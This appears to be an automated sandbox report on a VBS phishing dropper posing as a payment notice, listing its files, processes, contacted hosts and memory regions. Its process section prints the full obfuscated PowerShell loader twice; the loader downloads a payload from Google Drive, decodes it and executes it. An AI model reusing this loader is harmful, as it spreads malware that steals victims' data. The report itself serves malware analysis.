Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
OUTSTANDING PAYMENT STATUS 01199241024.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3413510p.ljv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qw3cchv.c5h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erbvguls.juw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5absdi2.yhe.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Mejeriernes.Pra
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik
Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI;
function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe;
for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function
Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn
';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr
u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic
l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats
Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen
uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe
Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo
ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao
Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc
ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten
(Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko
Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae
b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH
mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO
Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R
owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE
AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe
de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreewYUnd,sPUnredRUrinro SubjtYrke,OHunknCSportO inoll,eris Carci=Tribr
Teglh[CylinnUds iETunnatDeluc. ugtaSUrstre P rocHofstuOrdfrrArmgaIDagmatB.sunyTonetpUnm.rrEtheroEncumtIstanOProtecTelemoLiannLNewfoTUnsphy
LepipRejs,eForgi]Bru,s: Diff:Voca,tI pudl Til.sGanga1Efter2 Veks ');$dyrlgeforeningens=$Afmattede[0];$vang=(Efterbevilget
'Knkbr$An imGUnideLOpistO dataBEnth aMaglelBootm:FletkpHisseRNarraePellaaEjvindAfskrvBerkee ataoRFaks THa,seEPleisn Shu,CBacalY
aram=SeksanTmmereD,llsw ieti-PingeODeviaBRetfrjPalaeeBriquc Era TArbej PejakS ammeyUdpnsS count Opile Remam E,ik. P,liNAnbraeInfratBetal.
Hjr WRenowEBed abPineccKontoLEklipI trkuEKil.gNBristtB.nde ');Rationaliseringsgevinsten ($vang);Rationaliseringsgevinsten
(Efterbevilget 'Tentk$ amenPNo.corRet aeOversaTal,sd Formva tmaeAromerB rtltSystee tilln enfrc jlpeyHverd.OlenoHProfie ittia
IndtdWineseSubnerShi,ts Peda[avlsd$ aidLfelsoainvacu aanl UnexaSpedau Stri] uns =Flues$ Te ePE sperAnalfoStyrtvErym oA agyk
MultaOesopt Sci rVilje ');$Lensmen=Efterbevilget 'Bu.dm$RespeP BackrSk aae VintaOps gdBrugtvtvisteNarkorDoctotAnti,eCellun.unolc
GilbyU,lng.OversD ondoStroswTappanMaa el EfteoHelheaAbrazdSpigeF OrkniEnvellSannheKir r(Vntes$Afslud,nderyYnglerStersl AmatgLotteeTimevf
tagoKas.rr.onexeAtombn egrniNattenPrs igFrikaeGiantn peresplant,Lnudv$billensme ed EksplPreoba BlomnInderdCrappe KonsnReolsd
Se,eeTarsosPerso)Bug,e ';$ndlandendes=$Placeholders;Rationaliseringsgevinsten (Efterbevilget ' Ud a$CacheGUnvanl InstOCoryzban,spACa.cel.rein:Gl,ucRVagtkE
.yttSSigtvHEksklvAfvaneTelemrChiliV ,limESerriN ResuESaf e=Bevis(GrounTOphjnEforansKsersTOpbyg-UnjagPHigdiAR evatPlanfHSelen
Nonvi$Pee eNKaffeD BiotLTri,ha S olnSphendun,aseLareeNdydspdGastre reinsDemer) rem ');while (!$Reshvervene) {Rationaliseringsgevinsten
(Efterbevilget 'Intra$BefstgBndsllFrugaoRepe bFoldeaCurr lTospr:S,lekTCeru r UklaeKistetUnpr tI dtseSylten FiltaIssk,aRygmar
scifStipudSpielsFraileMultilSensisMis edMindsaTankegboldjeB.tra=Arqua$StjertThorarO givu traneB.lec ') ;Rationaliseringsgevinsten
$Lensmen;Rationaliseringsgevinsten (Efterbevilget ' atrosRessoT colya yaerR DragTKardi- MellSDevotlDrsp E arvee angp D.ce
ispe4 uld ');Rationaliseringsgevinsten (Efterbevilget 'Delim$Sl gmGBetonl ElemOW.iribtemp,APrayeLTjmo.:Prci rever E AerosBe
stHSk ndvGalatEBarberBillyVYu upEFrimnnbaledEKisss=Arbut(Moya TCatureapplaS Sat.TRe de- nlupFryseaUneratDeterHSynde F.ter$S
atsnGedesdGr.ssLShi aaDetalNFiftyDF siue Sp,in UndrDKunstEB rrishjem )Grupp ') ;Rationaliseringsgevinsten (Efterbevilget '
Mods$PilkegGleamlMil eoLkagebMaculaSminkL T ls:GodstSudrejvAftr IErythNA ditg ForrtPrepra,npresCopa KParagEFortinUndem4 ill=
Umaa$BandwgTid sLBanegOUnca.b MiniATorsilUltra:LemmaAAgioed QuasrKenloeEconos lantSLiveteKobbeK paahAUmbe t BrysAD sseL Mid.O
F ruGNiece+Syll +Overr%Ps.ro$ AnchA HuskfKesslm BrosAUshert HuslTStienESleepDDyrknEUncon.,ndercSkeweO.rencuTr.chn BrepTUfejl
') ;$dyrlgeforeningens=$Afmattede[$Svingtasken4];}$Fastgroede=329859;$Untraditional=31905;Rationaliseringsgevinsten (Efterbevilget
'Preex$Ba,gaGFuldhLSkrifODis eBhemmeaFlit L Z,la:SnverDRi gsEAdganNSa rrTDyrehe .kspRloko Opp,r= Bico llebrgFeltpechevrtCho
b-Odin cErgoto V riNNaigitBaro E,estuNFirest Suto Slad $PreacN CharDFilovL F.rmA CompNBulledKommeEAff.aNBgegrdPlacaeNuragsExhal
');Rationaliseringsgevinsten (Efterbevilget 'Vvest$TangogO dunlO,reroM,skibPosteaAmb,slI.pos:Fi keVMikroenybodntinglsCapack
Charain esbSko aestu,stRea i Forpl=Re li Nonsl[Ba.beSS aady Si is TruntBumbleKun emT phu.teen C FossoMindsnGenklvS.vbreCu,arrT.nontJul,b]Grapi:N,egt:PlanlFUnbewrGliddo
RegimGramiBSprngaRaadisT opieVinte6 acre4 UnthSLsnintcuriarUnshiiTransnAnordgE sek( Fadl$L ninDPrebeeOutprnTuri t ajaveServirtrans)sen
l ');Rationaliseringsgevinsten (Efterbevilget 'Micro$StudsGbaobaLDis.aoSube bFil yASbaikLBorts:Arrhyp ytiANonplpSal,saMorg
LBankeIAlluvZFiltea V.tatEm ndiDa seo Tra,n Flot Gr.na=Inter A gna[SgerksLandsySpie,sGrundT verE BuddMKdben.Br.lgtGstfreWilfuXM,lenTUnsla.Kna.sEPlateNsa
meCSalicOata iD AmouI.ndelnErhv.g Samm]Count:Gummi:CrenoaK,aliSStar.Ckr gsI AttriHaan .CentrG UdskEStyret Pr.iSIntertd.skeR
HodoiSl gtnE,surgHalvg(Koal $Trkk VVejr eRevolnConseSGarrukAggadASavsmbGrammeTiderT Nabo) Kll ');Rationaliseringsgevinsten
(Efterbevilget 'Nun.i$KalkbGBiklal Afsko b udBOmsteA Ko llNatur:prolefV lenLCockbESubdam UndeeTek trFor u=Dyble$ UncoPTll.rARegisPVarena
KundlmagneiOut,dZCeph.aIslett PolyiO,datoR prsN Unf .S mulSOutleUIntelB UncaSEco.ttmaughRRankiI trykNUnrumgVog t(Laxis$G agufKlista
nfixSAlk hTYderrG .abrR KartO Cor e R dldStrmpEantho,Gambo$ Bl tu Un,eNArbejtrubelRselveAUn erdMilliILanugT BegrI Bryno confNst
nbaLbebal En e)Ros n ');Rationaliseringsgevinsten $Flemer;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik
Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI;
function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe;
for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function
Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn
';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr
u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic
l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats
Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen
uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe
Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo
ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao
Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc
ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten
(Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko
Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae
b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH
mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO
Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R
owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE
AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe
de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreewYUnd,sPUnredRUrinro SubjtYrke,OHunknCSportO inoll,eris Carci=Tribr
Teglh[CylinnUds iETunnatDeluc. ugtaSUrstre P rocHofstuOrdfrrArmgaIDagmatB.sunyTonetpUnm.rrEtheroEncumtIstanOProtecTelemoLiannLNewfoTUnsphy
LepipRejs,eForgi]Bru,s: Diff:Voca,tI pudl Til.sGanga1Efter2 Veks ');$dyrlgeforeningens=$Afmattede[0];$vang=(Efterbevilget
'Knkbr$An imGUnideLOpistO dataBEnth aMaglelBootm:FletkpHisseRNarraePellaaEjvindAfskrvBerkee ataoRFaks THa,seEPleisn Shu,CBacalY
aram=SeksanTmmereD,llsw ieti-PingeODeviaBRetfrjPalaeeBriquc Era TArbej PejakS ammeyUdpnsS count Opile Remam E,ik. P,liNAnbraeInfratBetal.
Hjr WRenowEBed abPineccKontoLEklipI trkuEKil.gNBristtB.nde ');Rationaliseringsgevinsten ($vang);Rationaliseringsgevinsten
(Efterbevilget 'Tentk$ amenPNo.corRet aeOversaTal,sd Formva tmaeAromerB rtltSystee tilln enfrc jlpeyHverd.OlenoHProfie ittia
IndtdWineseSubnerShi,ts Peda[avlsd$ aidLfelsoainvacu aanl UnexaSpedau Stri] uns =Flues$ Te ePE sperAnalfoStyrtvErym oA agyk
MultaOesopt Sci rVilje ');$Lensmen=Efterbevilget 'Bu.dm$RespeP BackrSk aae VintaOps gdBrugtvtvisteNarkorDoctotAnti,eCellun.unolc
GilbyU,lng.OversD ondoStroswTappanMaa el EfteoHelheaAbrazdSpigeF OrkniEnvellSannheKir r(Vntes$Afslud,nderyYnglerStersl AmatgLotteeTimevf
tagoKas.rr.onexeAtombn egrniNattenPrs igFrikaeGiantn peresplant,Lnudv$billensme ed EksplPreoba BlomnInderdCrappe KonsnReolsd
Se,eeTarsosPerso)Bug,e ';$ndlandendes=$Placeholders;Rationaliseringsgevinsten (Efterbevilget ' Ud a$CacheGUnvanl InstOCoryzban,spACa.cel.rein:Gl,ucRVagtkE
.yttSSigtvHEksklvAfvaneTelemrChiliV ,limESerriN ResuESaf e=Bevis(GrounTOphjnEforansKsersTOpbyg-UnjagPHigdiAR evatPlanfHSelen
Nonvi$Pee eNKaffeD BiotLTri,ha S olnSphendun,aseLareeNdydspdGastre reinsDemer) rem ');while (!$Reshvervene) {Rationaliseringsgevinsten
(Efterbevilget 'Intra$BefstgBndsllFrugaoRepe bFoldeaCurr lTospr:S,lekTCeru r UklaeKistetUnpr tI dtseSylten FiltaIssk,aRygmar
scifStipudSpielsFraileMultilSensisMis edMindsaTankegboldjeB.tra=Arqua$StjertThorarO givu traneB.lec ') ;Rationaliseringsgevinsten
$Lensmen;Rationaliseringsgevinsten (Efterbevilget ' atrosRessoT colya yaerR DragTKardi- MellSDevotlDrsp E arvee angp D.ce
ispe4 uld ');Rationaliseringsgevinsten (Efterbevilget 'Delim$Sl gmGBetonl ElemOW.iribtemp,APrayeLTjmo.:Prci rever E AerosBe
stHSk ndvGalatEBarberBillyVYu upEFrimnnbaledEKisss=Arbut(Moya TCatureapplaS Sat.TRe de- nlupFryseaUneratDeterHSynde F.ter$S
atsnGedesdGr.ssLShi aaDetalNFiftyDF siue Sp,in UndrDKunstEB rrishjem )Grupp ') ;Rationaliseringsgevinsten (Efterbevilget '
Mods$PilkegGleamlMil eoLkagebMaculaSminkL T ls:GodstSudrejvAftr IErythNA ditg ForrtPrepra,npresCopa KParagEFortinUndem4 ill=
Umaa$BandwgTid sLBanegOUnca.b MiniATorsilUltra:LemmaAAgioed QuasrKenloeEconos lantSLiveteKobbeK paahAUmbe t BrysAD sseL Mid.O
F ruGNiece+Syll +Overr%Ps.ro$ AnchA HuskfKesslm BrosAUshert HuslTStienESleepDDyrknEUncon.,ndercSkeweO.rencuTr.chn BrepTUfejl
') ;$dyrlgeforeningens=$Afmattede[$Svingtasken4];}$Fastgroede=329859;$Untraditional=31905;Rationaliseringsgevinsten (Efterbevilget
'Preex$Ba,gaGFuldhLSkrifODis eBhemmeaFlit L Z,la:SnverDRi gsEAdganNSa rrTDyrehe .kspRloko Opp,r= Bico llebrgFeltpechevrtCho
b-Odin cErgoto V riNNaigitBaro E,estuNFirest Suto Slad $PreacN CharDFilovL F.rmA CompNBulledKommeEAff.aNBgegrdPlacaeNuragsExhal
');Rationaliseringsgevinsten (Efterbevilget 'Vvest$TangogO dunlO,reroM,skibPosteaAmb,slI.pos:Fi keVMikroenybodntinglsCapack
Charain esbSko aestu,stRea i Forpl=Re li Nonsl[Ba.beSS aady Si is TruntBumbleKun emT phu.teen C FossoMindsnGenklvS.vbreCu,arrT.nontJul,b]Grapi:N,egt:PlanlFUnbewrGliddo
RegimGramiBSprngaRaadisT opieVinte6 acre4 UnthSLsnintcuriarUnshiiTransnAnordgE sek( Fadl$L ninDPrebeeOutprnTuri t ajaveServirtrans)sen
l ');Rationaliseringsgevinsten (Efterbevilget 'Micro$StudsGbaobaLDis.aoSube bFil yASbaikLBorts:Arrhyp ytiANonplpSal,saMorg
LBankeIAlluvZFiltea V.tatEm ndiDa seo Tra,n Flot Gr.na=Inter A gna[SgerksLandsySpie,sGrundT verE BuddMKdben.Br.lgtGstfreWilfuXM,lenTUnsla.Kna.sEPlateNsa
meCSalicOata iD AmouI.ndelnErhv.g Samm]Count:Gummi:CrenoaK,aliSStar.Ckr gsI AttriHaan .CentrG UdskEStyret Pr.iSIntertd.skeR
HodoiSl gtnE,surgHalvg(Koal $Trkk VVejr eRevolnConseSGarrukAggadASavsmbGrammeTiderT Nabo) Kll ');Rationaliseringsgevinsten
(Efterbevilget 'Nun.i$KalkbGBiklal Afsko b udBOmsteA Ko llNatur:prolefV lenLCockbESubdam UndeeTek trFor u=Dyble$ UncoPTll.rARegisPVarena
KundlmagneiOut,dZCeph.aIslett PolyiO,datoR prsN Unf .S mulSOutleUIntelB UncaSEco.ttmaughRRankiI trykNUnrumgVog t(Laxis$G agufKlista
nfixSAlk hTYderrG .abrR KartO Cor e R dldStrmpEantho,Gambo$ Bl tu Un,eNArbejtrubelRselveAUn erdMilliILanugT BegrI Bryno confNst
nbaLbebal En e)Ros n ');Rationaliseringsgevinsten $Flemer;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://api.ipify.org/
|
104.26.12.205
|
||
|
http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://ocsp.sectigo.com0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.usercontent.googh(Lo
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://api.ipify.org/t
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://api.ipify.org
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
https://aka.ms/pscore6lBjq
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://mail.ihcm.com.my
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://drive.usercontent.google.com3Sou
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mail.ihcm.com.my
|
202.71.109.165
|
|
|
|
ip-api.com
|
208.95.112.1
|
|
|
|
drive.google.com
|
142.250.185.238
|
||
|
drive.usercontent.google.com
|
142.250.186.65
|
||
|
api.ipify.org
|
104.26.12.205
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
202.71.109.165
|
mail.ihcm.com.my
|
Malaysia
|
|
|
|
104.26.12.205
|
api.ipify.org
|
United States
|
||
|
142.250.185.238
|
drive.google.com
|
United States
|
||
|
142.250.186.65
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
24868000
|
trusted library allocation
|
page read and write
|
|
|
|
7805000
|
remote allocation
|
page execute and read and write
|
|
|
|
11FA909E000
|
trusted library allocation
|
page read and write
|
|
|
|
8430000
|
direct allocation
|
page execute and read and write
|
|
|
|
56A4000
|
trusted library allocation
|
page read and write
|
|
|
|
24845000
|
trusted library allocation
|
page read and write
|
|
|
|
BF75000
|
direct allocation
|
page execute and read and write
|
|
|
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
6AEB000
|
stack
|
page read and write
|
||
|
11F994CA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
EC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
11134B000
|
stack
|
page read and write
|
||
|
275A2000
|
trusted library allocation
|
page read and write
|
||
|
1105FE000
|
stack
|
page read and write
|
||
|
55377FD000
|
stack
|
page read and write
|
||
|
26864000
|
trusted library allocation
|
page read and write
